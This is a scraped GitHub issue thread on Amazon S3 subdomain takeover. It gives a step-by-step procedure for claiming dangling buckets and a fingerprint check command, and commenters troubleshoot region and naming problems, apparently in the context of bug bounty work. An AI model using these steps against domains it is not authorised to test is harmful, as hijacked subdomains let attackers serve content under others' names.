EdOverflow / can-i-take-over-xyz

"Can I take over XYZ?" — a list of services and how to claim (sub)domains with dangling DNS records.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Amazon S3 proofs

PatrikHudak opened this issue · comments

Service name

Amazon (AWS) S3

Proof

Amazon S3 service is indeed vulnerable. Amazon S3 follows pretty much the same concept of virtual hosting as other cloud providers. S3 buckets might be configured as website hosting to serve static content as web servers. If the canonical domain name has website in it, the S3 bucket is specified as Website hosting. I suspect that non-website and website configured buckets are handled by separate load balancers, and therefore they don't work with each other. The only difference will be in the bucket creation where correct website flag needs to be set if necessary. Step-by-step process:

  1. Go to S3 panel
  2. Click Create Bucket
  3. Set Bucket name to source domain name (i.e., the domain you want to take over)
  4. Click Next multiple times to finish
  5. Open the created bucket
  6. Click Upload
  7. Select the file which will be used for PoC (HTML or TXT file). I recommend naming it differently than index.html; you can use poc (without extension)
  8. In Permissions tab select Grant public read access to this object(s)
  9. After upload, select the file and click More -> Change metadata
  10. Click Add metadata, select Content-Type and value should reflect the type of document. If HTML, choose text/html, etc.
  11. (Optional) If the bucket was configured as a website
    1. Switch to Properties tab
    2. Click Static website hosting
    3. Select Use this bucket to host a website
    4. As an index, choose the file that you uploaded
    5. Click Save

To verify the domain, I run:

http -b GET http://{SOURCE DOMAIN NAME} | grep -E -q '<Code>NoSuchBucket</Code>|<li>Code: NoSuchBucket</li>' && echo "Subdomain takeover may be possible" || echo "Subdomain takeover is not possible"

Note that there are two possible error pages depending on the bucket settings (set as website hosting or not).

Some reports on H1, claiming S3 buckets:

Documentation

There are several formats of domains that Amazon uses for S3 (RegExp):

  • ^[a-z0-9\.\-]{0,63}\.?s3.amazonaws\.com$
  • ^[a-z0-9\.\-]{0,63}\.?s3-website[\.-](eu|ap|us|ca|sa|cn)-\w{2,14}-\d{1,2}\.amazonaws.com(\.cn)?$
  • ^[a-z0-9\.\-]{0,63}\.?s3[\.-](eu|ap|us|ca|sa)-\w{2,14}-\d{1,2}\.amazonaws.com$
  • ^[a-z0-9\.\-]{0,63}\.?s3.dualstack\.(eu|ap|us|ca|sa)-\w{2,14}-\d{1,2}\.amazonaws.com$

Note that there are cases where only raw domain (e.g. s3.amazon.com) is included in CNAME and takeover is still possible.

(Documentation taken from https://0xpatrik.com/takeover-proofs/)

I've come across a sub-domain which confirms the error message:

NoSuchBucket
The specified bucket does not exist
randombucket-assets

When use the dig command, the CNAME points to a random.cloudfront.net URL.

On trying to follow the above steps, getting below message while creating the S3 bucket with same name:
"Bucket name already exists"

I'm entering the full sub-domain name in the bucket name. Am I missing something to check?

Update: I've been able to find the S3 bucket URL: subdomain.s3.amazonaws.com

id 64053
opcode QUERY
rcode NOERROR
flags QR RD RA
;QUESTION
girishsarwal.me. IN CNAME
;ANSWER
;AUTHORITY
something.me. 899 IN SOA ns-732.awsdns-27.net. awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400
;ADDITIONAL

in s3 bucket, i'm facing this problem. What's solution for this ?
Screenshot_1

@soynek You're going to need to dig into the documentation for this one, we've had to draw the line at this repository being treated like a support desk. This is here to outline the work people have contributed back, and to outline vulnerable areas, but if you have a specific subdomain takeover question then the documentation for that service is where you should be looking.

@codingo
I want to takeover a subdomain and i face that problem as in picture showing. Any solution for this?

Hi
I found a domain with CNAME *.cloudfront.net
When I access it from browser it returned empty. I tried to add it to bucket by steps above and was successfully added. But when I access it, it's still empty, I tried other subdomains from same domain but they say 'Bucket name already exist'.
Please explain me this

@yoursquad13 Because *.cloudfront.net is not a subdomain for S3

commented

Hi, during a bug bounty activity I have found a subdomain vulnerable to takeover, the dig command returns this information:
sub.example.com CNAME [bucket_name].s3.amazonaws.com
and then:
[bucket_name].s3.amazonaws.com CNAME s3-1-w.amazonaws.com
I haven't the region information from dig command.

Also if I visit the page, I get an XML error. Below is the screenshot:
Screenshot_2020-02-26_15-59-34

The subdomain would seem vulnerable to takeover, but when I go to create the bucket from my AWS console, I get the following error:
Bucket name already exists

Anyone can help me?
Thank You!

commented

@webliqui
Any news on this issue? I am running into the same thing

Have you guys ran the AWS CLI like aws s3 ls <bucket_name>? I think this command search in all regions for a bucket name.

@webliqui You found something?
I'm facing the same issue.
@codingo Do you have some solution for this?

same issue as @webliqui. @codingo?

I believe, as I mentioned above, this issue is related to the region. This bucket may not be created on the region that you are testing on. But if you use the AWS CLI (aws s3 ls <bucket_name>) I believe you would find the bucket. I suggest you to test using the AWS CLI.

Hi @soareswallace :),
I got the same error and when I execute the command you suggested in the latest reply, I get this error: An error occurred (AllAccessDisabled) when calling the ListObjectsV2 operation: All access to this object has been disabled ... any tip to make possible the take over ?

Regards,
Mik

I believe when we get this message @Mik317 , the take over is not possible. This message show that the bucket does exist and has an owner.

Stay safe,

Wallace

Hi @soareswallace :).
Thanks for the reply. I'll be lucky the next time ;)

Until that, stay safe and hack the world ;)

Regards,
Mik

Hi @soareswallace
I discovered a subdomain whose CNAME is point to *.elb.amazonaws.com.
How can I takeover this subdomain? Is the process same as creating a s3 bucket?

Hi @FaizanNehal,

I tried once, but never found out how to do it. I also would like to know how we can takeover. Let us know if you discover anything.

Wallace

commented

Anyone knows about amazon route 53???? Is it vulnerable?

commented

I found a subdomain.domain.com that is vulnerable, and confirmed with dig that CNAME was for s3 bucket in Verginia
When I tried creating the bucket with the same name it worked but the endpoint for the bucket was like so:
^[a-z0-9\.\-]{0,63}\.?s3-website[\.-](eu|ap|us|ca|sa|cn)-\w{2,14}-\d{1,2}\.amazonaws.com(\.cn)?$
Which is mentioned in the documentation. OR
^[a-z0-9\.\-]{0,63}\.?s3.amazonaws\.com$/subdomain.domain.com/
Which is not.

my question is since it is not mentioned in the steps above how to make those regexes point to subdomain.domain.com?

is this service still vulnerable?

Hi @soareswallace
I discovered a subdomain whose CNAME is point to *.elb.amazonaws.com.
How can I takeover this subdomain? Is the process same as creating a s3 bucket?

Not really, usually before the elb there's a random number.

Hi,
I have found "The specified bucket does not exist" for few subdomains. But when I do a dig, the subdomains fail to give a CNAME record. So does it mean that they are not vulnerable. Or am I missing something here?

Hi @soareswallace
I discovered a subdomain whose CNAME is point to *.elb.amazonaws.com.
How can I takeover this subdomain? Is the process same as creating a s3 bucket?

did u find any info about it?

So far, from what I could search about it, is not possibly to take over amazon's load balance.

And as @pdelteil replied above:

Not really, usually before the elb there's a random number.

okey , thanks

id 64053
opcode QUERY
rcode NOERROR
flags QR RD RA
;QUESTION
girishsarwal.me. IN CNAME
;ANSWER
;AUTHORITY
something.me. 899 IN SOA ns-732.awsdns-27.net. awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400
;ADDITIONAL

in s3 bucket, i'm facing this problem. What's solution for this ?
Screenshot_1

in this case i try to create bucket by deleteing at recreating it ofcourse it take time but work it.

@technicaljunkie which kind?

Hi,

I've got the fingerprint The specified bucket does not exist However, when I dig for dns records using dig +nocmd +noall +answer CNAME sub.domain.com I get nothing on CNAME record ?

Does it mean some measures have already been taken ? can I take it over ?

Thank you in advance

Try ping to know region and in case of subdomain not necessary you usually see them clear when firewall being used

Do you mean traceroute?

@Sim4n6 no i mean ping sub.site.com

Well, either dig or ping got me the IP address. And it is located in Zurich. Now the question is the bucket name is unknown.

CNAME of sub.domain.com does not show a domain of format ^[a-z0-9.-]{0,63}.?s3.amazonaws.com$

But curl -v does return the fingerprint.

I've got the bucket name, so unfortunate the name is already taken 😕😕

id 64053 opcode QUERY rcode NOERROR flags QR RD RA ;QUESTION girishsarwal.me. IN CNAME ;ANSWER ;AUTHORITY something.me. 899 IN SOA ns-732.awsdns-27.net. awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400 ;ADDITIONAL

in s3 bucket, i'm facing this problem. What's solution for this ? Screenshot_1

Got this errror solved in some of my takeovers

I was checking for subdomain takeover and got a s3 bucket which doesn't exists and confirmed the takeover vulnerability with subzy, but the problem is im not able to create bucket with the vulnerable domain name, its says, Bucket with the same name already exists, so how to takeover this bucket??

eiTL45H29314

I was checking for subdomain takeover and got a s3 bucket which doesn't exists and confirmed the takeover vulnerability with subzy, but the problem is im not able to create bucket with the vulnerable domain name, its says, Bucket with the same name already exists, so how to takeover this bucket??

eiTL45H29314

It can possibly be a honeypot i saw same during one target else confirm you are entering bucket name because sometimes it's not same as host url

id 64053 opcode QUERY rcode NOERROR flags QR RD RA ;QUESTION girishsarwal.me. IN CNAME ;ANSWER ;AUTHORITY something.me. 899 IN SOA ns-732.awsdns-27.net. awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400 ;ADDITIONAL

in s3 bucket, i'm facing this problem. What's solution for this ? Screenshot_1

@soynek did you ever find a solution to this? If so, how did you fix it?

id 64053 opcode QUERY rcode NOERROR flags QR RD RA ;QUESTION girishsarwal.me. IN CNAME ;ANSWER ;AUTHORITY something.me. 899 IN SOA ns-732.awsdns-27.net. awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400 ;ADDITIONAL
in s3 bucket, i'm facing this problem. What's solution for this ? Screenshot_1

@soynek did you ever find a solution to this? If so, how did you fix it?

Bucket region mismatch change region

id 64053 opcode QUERY rcode NOERROR flags QR RD RA ;QUESTION girishsarwal.me. IN CNAME ;ANSWER ;AUTHORITY something.me. 899 IN SOA ns-732.awsdns-27.net. awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400 ;ADDITIONAL
in s3 bucket, i'm facing this problem. What's solution for this ? Screenshot_1

@soynek did you ever find a solution to this? If so, how did you fix it?

In your case us-west-2 is region

id 64053 opcode QUERY rcode NOERROR flags QR RD RA ;QUESTION girishsarwal.me. IN CNAME ;ANSWER ;AUTHORITY something.me. 899 IN SOA ns-732.awsdns-27.net. awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400 ;ADDITIONAL
in s3 bucket, i'm facing this problem. What's solution for this ? Screenshot_1

@soynek did you ever find a solution to this? If so, how did you fix it?

Bucket region mismatch change region

@GDATTACKER-RESEARCHER how can you find out which one you need to change to out of the 22 options?

id 64053 opcode QUERY rcode NOERROR flags QR RD RA ;QUESTION girishsarwal.me. IN CNAME ;ANSWER ;AUTHORITY something.me. 899 IN SOA ns-732.awsdns-27.net. awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400 ;ADDITIONAL
in s3 bucket, i'm facing this problem. What's solution for this ? Screenshot_1

@soynek did you ever find a solution to this? If so, how did you fix it?

Bucket region mismatch change region

@GDATTACKER-RESEARCHER how can you find out which one you need to change to out of the 22 options?

Different ways depend on case by case bases by ping, other buckets in use by site, cname etc

Is this vulnerable?
asdasd.target.com shows this

<Error>
<Code>NoSuchBucket</Code>
<Message>The specified bucket does not exist.</Message>
<Resource>/asd</Resource>
<RequestId>uzEH...</RequestId>
</Error>

And DIG shows this:

target.com.       *   IN      NS      ns-*.awsdns-53.net.
target.com.       *   IN      NS      ns-*.awsdns-58.org.
target.com.       *   IN      NS      ns-*.awsdns-23.co.uk.
target.com.       *   IN      NS      ns-*.awsdns-44.com.

* - Stars are in the place of some numbers

Is this vulnerable? asdasd.target.com shows this

<Error>
<Code>NoSuchBucket</Code>
<Message>The specified bucket does not exist.</Message>
<Resource>/asd</Resource>
<RequestId>uzEH...</RequestId>
</Error>

And DIG shows this:

target.com.       *   IN      NS      ns-*.awsdns-53.net.
target.com.       *   IN      NS      ns-*.awsdns-58.org.
target.com.       *   IN      NS      ns-*.awsdns-23.co.uk.
target.com.       *   IN      NS      ns-*.awsdns-44.com.

* - Stars are in the place of some numbers

Yes

Is this vulnerable? asdasd.target.com shows this

<Error>
<Code>NoSuchBucket</Code>
<Message>The specified bucket does not exist.</Message>
<Resource>/asd</Resource>
<RequestId>uzEH...</RequestId>
</Error>

And DIG shows this:

target.com.       *   IN      NS      ns-*.awsdns-53.net.
target.com.       *   IN      NS      ns-*.awsdns-58.org.
target.com.       *   IN      NS      ns-*.awsdns-23.co.uk.
target.com.       *   IN      NS      ns-*.awsdns-44.com.

* - Stars are in the place of some numbers

Yes

Have you tried?

Is this vulnerable? asdasd.target.com shows this

<Error>
<Code>NoSuchBucket</Code>
<Message>The specified bucket does not exist.</Message>
<Resource>/asd</Resource>
<RequestId>uzEH...</RequestId>
</Error>

And DIG shows this:

target.com.       *   IN      NS      ns-*.awsdns-53.net.
target.com.       *   IN      NS      ns-*.awsdns-58.org.
target.com.       *   IN      NS      ns-*.awsdns-23.co.uk.
target.com.       *   IN      NS      ns-*.awsdns-44.com.

* - Stars are in the place of some numbers

Yes

Have you tried?

🤣😂 nice question i still hai 15 buckets claimed i guess

Is this vulnerable? asdasd.target.com shows this

<Error>
<Code>NoSuchBucket</Code>
<Message>The specified bucket does not exist.</Message>
<Resource>/asd</Resource>
<RequestId>uzEH...</RequestId>
</Error>

And DIG shows this:

target.com.       *   IN      NS      ns-*.awsdns-53.net.
target.com.       *   IN      NS      ns-*.awsdns-58.org.
target.com.       *   IN      NS      ns-*.awsdns-23.co.uk.
target.com.       *   IN      NS      ns-*.awsdns-44.com.

* - Stars are in the place of some numbers

Yes

Have you tried?

🤣😂 nice question i still hai 15 buckets claimed i guess

Good for you, thanks for the help!!

Hello everyone,

I can confirm this takeover is still possible, adding some details:

  • If you get an error as 'the bucket .... already exists' --> it's not vulnerable.
  • A CNAME pointing to a AWS domain name is not necessary. I took a bucket that was pointing to several IP addresses. The relevant part is the response fingerprint.
  • The error with Code: IncorrectEndpoint can be fixed removing and creating the bucket in another region. It takes around 1 hour for the bucket to be removed, before that you won't be able to create it. Use AWS Cli to automate this part.
  • If you are getting Access denied errors, check this guide

Hello everyone,

I can confirm this takeover is still possible, adding some details:

  • If you get an error as 'the bucket .... already exists' --> it's not vulnerable.
  • A CNAME pointing to a AWS domain name is not necessary. I took a bucket that was pointing to several IP addresses. The relevant part is the response fingerprint.
  • The error with Code: IncorrectEndpoint can be fixed removing and creating the bucket in another region. It takes around 1 hour for the bucket to be removed, before that you won't be able to create it. Use AWS Cli to automate this part.
  • If you are getting Access denied errors, check this guide

i try to take subdomain from s3 bucket, if i try access subdomain ex : sub.domain.com always return error 403. but if i access sub.domain.com/index.html it can be open normally. whats the problem?

@radiustama77 AWS has very granular permission controls. Opening sub.domain.com/ needs s3:ListBucket permission which you don't have. However, you do have permission to s3:GetObject so if you can guess the name of the file, you will be able to get it.
Based on the behavior you described, subdomain takeover is not possible. Also, it seems that bucket files are intended to be public based on 'index.html' filename implications. You may try brute-forcing for filenames and see if you get something sensitive (with gobuster for example).

@radiustama77 AWS has very granular permission controls. Opening sub.domain.com/ needs s3:ListBucket permission which you don't have. However, you do have permission to s3:GetObject so if you can guess the name of the file, you will be able to get it. Based on the behavior you described, subdomain takeover is not possible. Also, it seems that bucket files are intended to be public based on 'index.html' filename implications. You may try brute-forcing for filenames and see if you get something sensitive (with gobuster for example).

what i mean is, i already can takeover several subdomain. but for some subdomain, whenever i try to access with subdomain.example.com it return to error 403 access denied. But if i access it with subdomain.example.com/index.html it works and normal.

@radiustama77 AWS has very granular permission controls. Opening sub.domain.com/ needs s3:ListBucket permission which you don't have. However, you do have permission to s3:GetObject so if you can guess the name of the file, you will be able to get it. Based on the behavior you described, subdomain takeover is not possible. Also, it seems that bucket files are intended to be public based on 'index.html' filename implications. You may try brute-forcing for filenames and see if you get something sensitive (with gobuster for example).

what i mean is, i already can takeover several subdomain. but for some subdomain, whenever i try to access with subdomain.example.com it return to error 403 access denied. But if i access it with subdomain.example.com/index.html it works and normal.

That's because you have not specified index files in static hosting which you need to for index page. Else it keep coming up with error 403

@GDATTACKER-RESEARCHER I already specified the index file in static hosting.
the url from s3 amazon work properly too like subdomain.s3-website-us-east-1.amazonaws.com but error still happened when i try to access via subdomain.example.com

It means that the ,bucket is not available for takeovers.
123Capture

It means that the ,bucket is not available for takeovers. 123Capture

Yes it is not possible to claim this one as it's already in use just the permissions for static hosting has been disabled

commented

id 64053 opcode QUERY rcode NOERROR flags QR RD RA ;QUESTION girishsarwal.me. IN CNAME ;ANSWER ;AUTHORITY something.me. 899 IN SOA ns-732.awsdns-27.net. awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400 ;ADDITIONAL
in s3 bucket, i'm facing this problem. What's solution for this ? Screenshot_1

@soynek did you ever find a solution to this? If so, how did you fix it?

In your case us-west-2 is region

how to know the region?

id 64053 opcode QUERY rcode NOERROR flags QR RD RA ;QUESTION girishsarwal.me. IN CNAME ;ANSWER ;AUTHORITY something.me. 899 IN SOA ns-732.awsdns-27.net. awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400 ;ADDITIONAL
in s3 bucket, i'm facing this problem. What's solution for this ? Screenshot_1

@soynek did you ever find a solution to this? If so, how did you fix it?

In your case us-west-2 is region

how to know the region?

simply change the region to us-west-2 in your case for domain girishsarwal.me

commented

girishsarwal.me

yeah i mean how to know the region of the domain?

commented

id 64053 opcode QUERY rcode NOERROR flags QR RD RA ;QUESTION girishsarwal.me. IN CNAME ;ANSWER ;AUTHORITY something.me. 899 IN SOA ns-732.awsdns-27.net. awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400 ;ADDITIONAL
in s3 bucket, i'm facing this problem. What's solution for this ? Screenshot_1

@soynek did you ever find a solution to this? If so, how did you fix it?

In your case us-west-2 is region

how to know the region?

simply change the region to us-west-2 in your case for domain girishsarwal.me

image
like in this how i can get the correct region to create a bucket with this domains

girishsarwal.me

yeah i mean how to know the region of the domain?

simply try common methods if not possible by that you need to change regions after every 2 hours until you get right one

commented

girishsarwal.me

yeah i mean how to know the region of the domain?

simply try common methods if not possible by that you need to change regions after every 2 hours until you get right one

image
what the common methods? to get the region

girishsarwal.me

yeah i mean how to know the region of the domain?

simply try common methods if not possible by that you need to change regions after every 2 hours until you get right one

image what the common methods? to get the region

simply you can also reffer ip history to find the exact ip range matching your vulnerable domain ip https://ip-ranges.amazonaws.com/ip-ranges.json

commented

girishsarwal.me

yeah i mean how to know the region of the domain?

simply try common methods if not possible by that you need to change regions after every 2 hours until you get right one

image what the common methods? to get the region

simply you can also reffer ip history to find the exact ip range matching your vulnerable domain ip https://ip-ranges.amazonaws.com/ip-ranges.json

i check the ip for my site with the ping , and then use method like you do to check ip ranges in the amazon prefix but didnt found how i can get the region ? if the ip not avalaibe in that data you send

Using other bucket used by websites's default location, using the ip ranges of bucket, use aws-cli to know region etc

girishsarwal.me

yeah i mean how to know the region of the domain?

simply try common methods if not possible by that you need to change regions after every 2 hours until you get right one

image what the common methods? to get the region

simply you can also reffer ip history to find the exact ip range matching your vulnerable domain ip https://ip-ranges.amazonaws.com/ip-ranges.json

i check the ip for my site with the ping , and then use method like you do to check ip ranges in the amazon prefix but didnt found how i can get the region ? if the ip not avalaibe in that data you send

Ip range is available if you know networking you should know easily your ip range is mentioned there.

commented

girishsarwal.me

yeah i mean how to know the region of the domain?

simply try common methods if not possible by that you need to change regions after every 2 hours until you get right one

image what the common methods? to get the region

simply you can also reffer ip history to find the exact ip range matching your vulnerable domain ip https://ip-ranges.amazonaws.com/ip-ranges.json

i check the ip for my site with the ping , and then use method like you do to check ip ranges in the amazon prefix but didnt found how i can get the region ? if the ip not avalaibe in that data you send

Ip range is available if you know networking you should know easily your ip range is mentioned there.

example this endpass.com this i lookup ip
and got 104.21.37.171 after that i check in iprange prefix amazon but still didnt find , can you give advice?

why you need script for it when you can do manually.

Hi guys, is this still vulnerable?
I get an error that the bucket name is already taken.🤔

Hi guys I found the following scenario:

  1. subdomain.example.com returning NoSuchBucket

  2. dig cname subdomain.example.com returns:

> dig cname subdomain.example.com                                                                   

; <<>> DiG 9.18.12-0ubuntu0.22.04.3-Ubuntu <<>> cname subdomain.example.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 43658
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 65494
;; QUESTION SECTION:
;subdomain.example.com.	IN	CNAME

;; ANSWER SECTION:
subdomain.example.com. 3600 IN	CNAME	RANDOM_NAME_SEQUENCE.s3.amazonaws.com.

;; Query time: 31 msec
;; SERVER: 127.0.0.53#53(127.0.0.53) (UDP)
;; WHEN: Thu Nov 02 10:55:24 CET 2023
;; MSG SIZE  rcvd: 131
  1. Checked bucket region by curl -sI RANDOM_NAME_SEQUENCE.s3.amazonaws.com | grep bucket-region

  2. Claimed and created an S3 bucket with the name RANDOM_NAME_SEQUENCE.s3.amazonaws.com on the region from the previous step and uploaded a poc to RANDOM_NAME_SEQUENCE.s3.amazonaws.com/poc, made it public, both the bucket and the poc file.

  3. Navigated to https://RANDOM_NAME_SEQUENCE.s3.amazonaws.com/poc and the file shows properly.

  4. subdomain.example.com/poc still shows NoSuchBucket.

Also tried the to create the bucket as static website hosting. Does anyone found this scenario or know what's happening here?

@six2dez please refer to this issue #361 I have faced similar kind of scenario hope it will be useful

Bucket with the same name already exists

Is this edge case now?

Bucket with the same name already exists

Is this edge case now?

No